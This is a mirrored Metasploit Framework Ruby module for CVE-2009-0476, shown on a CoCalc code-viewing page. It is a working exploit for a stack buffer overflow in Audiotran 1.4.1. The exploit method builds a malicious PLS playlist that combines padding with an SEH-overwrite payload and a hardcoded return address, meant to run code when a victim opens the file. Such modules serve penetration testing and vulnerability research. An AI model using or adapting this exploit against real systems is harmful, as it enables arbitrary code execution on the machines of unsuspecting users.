Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audiotran_pls.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
19
An attacker must send the file to victim and the victim must open the file.
20
Alternatively it may be possible to execute code remotely via an embedded
21
PLS file within a browser, when the PLS extension is registered to Audiotran.
22
This functionality has not been tested in this module.
23
},
24
'License' => MSF_LICENSE,
25
'Author' => [
26
'Sebastien Duquette',
27
'dookie',
28
],
29
'References' => [
30
[ 'CVE', '2009-0476'],
31
[ 'OSVDB', '55424'],
32
[ 'EDB', '11079' ],
33
],
34
'Payload' => {
35
'Space' => 6000,
36
'BadChars' => "\x00\x0a\x3d",
37
'StackAdjustment' => -3500,
38
},
39
'Platform' => 'win',
40
'Targets' => [
41
[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], # p/p/r in rsaadjd.tmp
42
],
43
'Privileged' => false,
44
'DisclosureDate' => '2010-01-09',
45
'DefaultTarget' => 0,
46
'Notes' => {
47
'Reliability' => UNKNOWN_RELIABILITY,
48
'Stability' => UNKNOWN_STABILITY,
49
'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
}
51
)
52
)
53
54
register_options(
55
[
56
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
57
]
58
)
59
end
60
61
def exploit
62
sploit = rand_text_alpha_upper(1308)
63
sploit << generate_seh_payload(target.ret)
64
sploit << rand_text_alpha_upper(8000)
65
66
print_status("Creating '#{datastore['FILENAME']}' file ...")
67
68
file_create(sploit)
69
end
70
end
71
72